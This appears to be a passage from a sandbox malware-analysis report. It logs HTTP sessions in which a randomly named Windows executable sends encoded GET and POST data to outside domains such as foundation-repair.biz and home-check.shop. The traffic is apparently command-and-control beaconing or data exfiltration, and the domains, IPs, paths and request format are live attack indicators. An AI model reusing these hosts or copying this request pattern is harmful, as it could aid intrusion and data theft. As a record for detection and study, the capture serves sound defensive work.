                                                                                                                                                                                                                                                              Data Ascii: 9B6h=Fl3Y1slJcSGCweiUJJ0nfaY6xfaYP4bSPakGjczv+ZPWXyB3K3BMd3prAgeqGPvA/YJnTANfDkzu2itXDgas8faiuEiBu/LvW939Qbje9PLaX8juVuzzU2UwoCmvJwiVifINK7TCj8+p6f0lLa6HpIsitltQeEcRVaQG/8LCRAmOGeO/H0hfxIJPIAzLirA+IVjwIQLXyIH2rifr53y3LajyenthkQPovt0wii96/ktfj3GSPt+6p+HmkaHOJUfY51hOBRG9iv5s9iDurVtSTZkZYz7bPVWFdZQZ0hGYBANZ55icnubgVgChSUrj7ISo+TV3dF4Hne2Mtn4Xpwtz7UBDdFr4M7F7hLlLXyoPcQbYGj31NWWRB54fXjM44r66LMa2Ls1VgN88I5OHEkaSoCAb3RVnc0dGG0yxXLAJZzTSTqZJXzWgzd9HPfRmZJl6x9L5HRjt0q+2dpNlc/36mCnEtIgMyArwTyi45wr/XOZQGUimXMvODOiFsM1z/GuHD/1v/gh6rr7GDhLukgTCDc2++vslXH1n1CBcgux5/D7FqkWEEYYnR6wAd6N2XUDHXvPq5V/bpDZ142Wmm+nceC6qEWqp10oglMbRhnVi/krOpe5c7nfz40di45+87V65ouCzlliOWKYlb48tC5weh7Qx8cp28HYaTL5WSkYpMYrTkDSS/ttGlmlwRz2hBZMB4luykIhw/bP4HyfWcdN0KU71ip+AEJSBjOfBnmB0pGGkjfJxKnxNY19XVYMA/W8zZVYZYBYqv/ZmC6WHsUQjBgCw6Y+WOJo+amo9ZS+Ucl77dLZWA1dJMomuMkRH8T5MsXBEgXdHZE8hkV82QWWv8HbXbJ2C3BovVlPKiZ63MBQ8oxCuhmj43ZeYVtupY7hT+vZfxpTUNeYeTsxLiFERplwivLfaj9TqT6bCSxlKIdtNhuzCOtBkeI+1kjbf8K9ydqgGdn7MSdLP37S6KcTZIvco2kAAK7gHweMy5kEyoO7X1+U [TRUNCATED]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.257860899 CEST5411OUTData Raw: 33 79 71 58 51 49 66 55 79 4f 4c 43 45 4f 42 52 71 37 68 4d 39 46 70 61 38 77 2b 5a 64 50 4b 52 34 68 62 62 35 6e 79 76 64 72 73 4a 4c 77 68 63 6f 4d 57 75 67 75 7a 47 7a 68 2f 47 2b 4d 54 59 56 38 52 50 38 73 77 56 62 47 44 5a 70 2b 47 67 66 79
                                                                                                                                                                                                                                                              Data Ascii: 3yqXQIfUyOLCEOBRq7hM9Fpa8w+ZdPKR4hbb5nyvdrsJLwhcoMWuguzGzh/G+MTYV8RP8swVbGDZp+GgfyJDECtbl04ha3DDC61333ZirSCUzpqkAZMb4ql+/krK7fEVzTtf9LQhX+5v4UoKGJpuAbe0+Xslabbupk6NUYMKEGc9qZzX0N2zfRextCv99KRhEXEE3qQefGjXeX29hGoLyTJgsQdONbojLeMa+/eS1OesRXIVeJ2
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:22.538935900 CEST292INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:22 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                              Data Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              32192.168.11.2049773185.230.15.380900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:25.019814968 CEST552OUTGET /ns8q/?9B6h=Inf42ZVLRw6HwISCOPUKL9E43+GpX4bkPpg82teOxrbDSww0PzIRQy8gHWXiaO2t1uZOdy10GUfR4hRxDB6Ts5zJpETBxtnbe//OQKeepMDnU8nxUbj7e0s=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.home-check.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:25.300543070 CEST254INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:25 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Data Raw: 34 36 0d 0a 3c 68 31 3e 52 65 6c 61 74 65 64 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 53 6f 72 72 79 2c 20 77 65 20 63 61 6e 6e 6f 74 20 66 69 6e 64 20 74 68 61 74 20 70 61 67 65 2e 3c 2f 70 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 46<h1>Related Page not found</h1><p>Sorry, we cannot find that page.</p>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              33192.168.11.2049774199.59.243.22780900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:30.422291994 CEST838OUTPOST /enra/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.foundation-repair.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.foundation-repair.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.foundation-repair.biz/enra/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 4a 73 68 79 66 65 61 55 65 56 41 50 39 4e 38 4a 4b 4f 39 6e 59 4a 4e 32 57 61 47 63 61 53 5a 69 65 52 72 63 5a 6d 31 4a 71 71 70 42 68 73 5a 54 70 6f 2b 55 31 44 56 48 2f 7a 74 69 42 36 54 47 7a 50 31 64 71 7a 41 6b 71 62 4b 42 34 46 66 37 62 66 47 67 56 55 6b 57 51 66 59 66 75 4d 39 46 75 45 70 5a 6d 4a 38 77 37 52 70 2f 72 53 56 55 6c 4a 4d 36 53 74 43 69 74 51 45 6e 59 75 66 42 62 39 74 75 48 31 56 65 52 57 4c 43 6e 38 59 41 7a 65 6d 4a 74 69 52 5a 33 45 72 50 4d 69 4c 37 71 74 6b 6c 49 78 77 70 4c 30 69 48 5a 34 4d 58 77 70 43 54 4d 32 57 68 4b 62 56 6a 6a 53 52 46 47 77 3d 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=JshyfeaUeVAP9N8JKO9nYJN2WaGcaSZieRrcZm1JqqpBhsZTpo+U1DVH/ztiB6TGzP1dqzAkqbKB4Ff7bfGgVUkWQfYfuM9FuEpZmJ8w7Rp/rSVUlJM6StCitQEnYufBb9tuH1VeRWLCn8YAzemJtiRZ3ErPMiL7qtklIxwpL0iHZ4MXwpCTM2WhKbVjjSRFGw==
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:30.523932934 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:39:30 GMT
                                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              content-length: 1154
                                                                                                                                                                                                                                                              x-request-id: 3a07fcfb-0963-4445-9b2b-5add4b871b74
                                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==
                                                                                                                                                                                                                                                              set-cookie: parking_session=3a07fcfb-0963-4445-9b2b-5add4b871b74; expires=Wed, 09 Oct 2024 11:54:30 GMT; path=/
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4a 55 4d 72 70 7a 53 30 4a 53 6f 33 6b 44 48 47 53 64 2f 78 69 37 31 52 44 66 6d 34 37 4d 2b 42 79 59 4f 71 6a 7a 6a 50 57 49 63 44 4f 53 71 78 46 6a 36 39 45 76 6e 4e 6e 69 55 52 46 79 7a 65 2b 65 61 57 55 39 58 72 4b 5a 6f 75 70 56 4b 58 55 45 30 53 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:30.524054050 CEST554INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                                                                                                                                                              Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiM2EwN2ZjZmItMDk2My00NDQ1LTliMmItNWFkZDRiODcxYjc0IiwicGFnZV90aW1lIjoxNzI4NDczOTcwLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZm91bmRhdGlvbi1yZXB


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              34192.168.11.2049775199.59.243.22780900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:33.045171022 CEST858OUTPOST /enra/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.foundation-repair.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.foundation-repair.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.foundation-repair.biz/enra/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 4a 73 68 79 66 65 61 55 65 56 41 50 37 74 4d 4a 47 4e 56 6e 49 5a 4e 70 54 61 47 63 54 79 5a 35 65 52 76 63 5a 6e 42 6e 71 63 35 42 67 4f 42 54 6f 70 2b 55 79 44 56 48 71 44 74 37 4c 61 54 5a 7a 50 34 6f 71 33 45 6b 71 66 69 42 34 46 76 37 61 73 65 68 61 6b 6b 55 59 2f 59 64 77 38 39 46 75 45 70 5a 6d 49 5a 72 37 52 78 2f 72 6a 6c 55 6c 74 51 35 4d 39 43 74 36 67 45 6e 4f 65 66 64 62 39 73 4c 48 31 6c 77 52 55 7a 43 6e 38 6f 41 7a 76 6d 49 6b 69 51 53 71 55 71 48 44 42 6e 78 6d 64 55 6f 4a 54 55 45 43 57 4f 63 52 4f 64 4e 74 62 32 33 50 6c 4b 54 4f 72 73 4c 68 51 51 65 62 77 31 4c 4d 69 62 2b 4f 75 4f 43 43 6d 4c 4b 71 38 35 32 59 7a 55 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=JshyfeaUeVAP7tMJGNVnIZNpTaGcTyZ5eRvcZnBnqc5BgOBTop+UyDVHqDt7LaTZzP4oq3EkqfiB4Fv7asehakkUY/Ydw89FuEpZmIZr7Rx/rjlUltQ5M9Ct6gEnOefdb9sLH1lwRUzCn8oAzvmIkiQSqUqHDBnxmdUoJTUECWOcROdNtb23PlKTOrsLhQQebw1LMib+OuOCCmLKq852YzU=
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:33.146883965 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:39:32 GMT
                                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              content-length: 1154
                                                                                                                                                                                                                                                              x-request-id: 32e3ccf8-df8d-483f-a613-9dc1098ad73a
                                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==
                                                                                                                                                                                                                                                              set-cookie: parking_session=32e3ccf8-df8d-483f-a613-9dc1098ad73a; expires=Wed, 09 Oct 2024 11:54:33 GMT; path=/
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4a 55 4d 72 70 7a 53 30 4a 53 6f 33 6b 44 48 47 53 64 2f 78 69 37 31 52 44 66 6d 34 37 4d 2b 42 79 59 4f 71 6a 7a 6a 50 57 49 63 44 4f 53 71 78 46 6a 36 39 45 76 6e 4e 6e 69 55 52 46 79 7a 65 2b 65 61 57 55 39 58 72 4b 5a 6f 75 70 56 4b 58 55 45 30 53 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:33.146894932 CEST554INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                                                                                                                                                              Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzJlM2NjZjgtZGY4ZC00ODNmLWE2MTMtOWRjMTA5OGFkNzNhIiwicGFnZV90aW1lIjoxNzI4NDczOTczLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZm91bmRhdGlvbi1yZXB


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              35192.168.11.2049776199.59.243.22780900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.669955969 CEST1289OUTPOST /enra/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.foundation-repair.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.foundation-repair.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.foundation-repair.biz/enra/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 4a 73 68 79 66 65 61 55 65 56 41 50 37 74 4d 4a 47 4e 56 6e 49 5a 4e 70 54 61 47 63 54 79 5a 35 65 52 76 63 5a 6e 42 6e 71 63 78 42 68 39 4a 54 70 4b 57 55 7a 44 56 48 32 54 74 6d 4c 61 53 46 7a 50 67 6b 71 79 64 54 71 5a 6d 42 36 6d 6e 37 50 70 71 68 42 30 6b 55 61 2f 59 65 75 4d 38 46 75 41 4e 6e 6d 4a 70 72 37 52 78 2f 72 68 74 55 73 5a 4d 35 4f 39 43 69 74 51 45 52 59 75 66 68 62 39 30 39 48 30 52 4f 52 6b 54 43 70 34 4d 41 67 74 2b 49 6d 43 51 51 70 55 72 42 44 42 71 72 6d 64 4a 58 4a 53 51 75 43 51 4f 63 56 72 73 78 79 76 32 4c 63 47 57 72 45 49 63 56 69 48 34 32 57 68 42 4d 45 77 33 45 4e 35 58 4c 4b 31 44 63 76 2f 38 73 42 31 35 71 6e 66 31 52 74 43 79 4b 44 38 6c 62 4e 47 2f 44 46 35 2b 67 59 2b 44 73 51 2b 34 72 70 56 4e 32 7a 50 71 69 61 63 56 38 4e 6e 70 31 6d 5a 30 54 62 72 64 2f 76 73 37 6b 42 5a 43 42 76 37 4f 4f 57 7a 76 41 6c 63 2f 38 61 62 68 56 2f 36 70 62 6f 38 6d 4a 69 48 6d 66 79 42 74 76 4d 38 57 2b 39 53 69 68 5a 4b 4b 51 54 61 48 62 4b 76 57 38 49 41 67 47 59 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=JshyfeaUeVAP7tMJGNVnIZNpTaGcTyZ5eRvcZnBnqcxBh9JTpKWUzDVH2TtmLaSFzPgkqydTqZmB6mn7PpqhB0kUa/YeuM8FuANnmJpr7Rx/rhtUsZM5O9CitQERYufhb909H0RORkTCp4MAgt+ImCQQpUrBDBqrmdJXJSQuCQOcVrsxyv2LcGWrEIcViH42WhBMEw3EN5XLK1Dcv/8sB15qnf1RtCyKD8lbNG/DF5+gY+DsQ+4rpVN2zPqiacV8Nnp1mZ0Tbrd/vs7kBZCBv7OOWzvAlc/8abhV/6pbo8mJiHmfyBtvM8W+9SihZKKQTaHbKvW8IAgGY+BourjsFAy32MD8z2VXO6/Dsuhopwoa4U/QDlcegLezu+mXzoPNgMVr0QGBmGHUotEiwqVcr3+NJmmtaI591strWiB4PeIMQ7c3P4ql2gw8u+LwCAraSv8b9lanRj7ZckEdVW/G9jiRE8OoxS6P3Z+tSG7bfkzryFVInWyyvJPUGe9JF2YZQ7W5PBCeEgrbf7zH9zVxYxJeyIf2qwJbESYXzJqr6F1GiOY/+28YrSkxzXzwTwKXC0koG4HfcOU1UwGtZcXe/0SkwdxVIMK9pmpdH+cyrhd3mW4j93kNpqju9E4qWcDMBfDf+Q
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.670006037 CEST2578OUTData Raw: 41 6d 59 35 50 2b 61 77 79 39 79 66 56 69 33 4c 6d 45 71 5a 6b 61 4d 5a 39 55 4e 4c 53 39 6b 77 6c 79 35 4e 6e 2f 54 53 6b 4c 5a 4b 69 42 44 70 53 34 49 43 66 67 6a 6c 44 55 52 42 2b 2b 57 33 58 67 56 6e 37 67 43 50 56 53 64 6f 7a 4f 37 73 73 47
                                                                                                                                                                                                                                                              Data Ascii: AmY5P+awy9yfVi3LmEqZkaMZ9UNLS9kwly5Nn/TSkLZKiBDpS4ICfgjlDURB++W3XgVn7gCPVSdozO7ssGemaLy0yv7/vZiYaGPeucazYPl9Zky/UKylddZRWRxF3WqeCStu69yEx+3+Xgaykwmcd74Ai3EAPPxNdfDYoeTbnemERo1afWSapz4Eg+zdpjdm3/63WC+PQLH/UST+ZZb2rWaaH37VuIhVwYKJrMnUUlmrn2Zx7G8
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.670054913 CEST4140OUTData Raw: 30 77 66 45 76 46 39 6a 49 49 4c 74 38 35 57 53 56 4f 78 58 76 4f 68 45 30 6b 56 77 34 51 55 5a 5a 50 76 4b 4b 44 74 61 6b 56 64 56 79 69 73 57 6b 49 35 48 69 64 6c 39 53 4d 4e 69 64 45 36 37 6f 44 61 39 71 6e 75 65 33 7a 63 7a 6d 31 36 6a 4a 63
                                                                                                                                                                                                                                                              Data Ascii: 0wfEvF9jIILt85WSVOxXvOhE0kVw4QUZZPvKKDtakVdVyisWkI5Hidl9SMNidE67oDa9qnue3zczm16jJctEeSGiZToqKXpE1AhPupbiYgcyaTPoj/v381hFRFXI/6FewzdCNw9yBWjek9rsjULByge5lz31AIQ9ZZ1mkLkkPAdhGuCYMRhV63vSQviONCt6cCrgZEFRI5/kj9+i/822L62pzrZEk/aNrB/7mO93mZuYRIqQMnc
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.772002935 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:39:35 GMT
                                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              content-length: 1154
                                                                                                                                                                                                                                                              x-request-id: 1fc87c9d-e1e7-40a6-a5cc-d2d320cc1ece
                                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==
                                                                                                                                                                                                                                                              set-cookie: parking_session=1fc87c9d-e1e7-40a6-a5cc-d2d320cc1ece; expires=Wed, 09 Oct 2024 11:54:35 GMT; path=/
                                                                                                                                                                                                                                                              connection: close
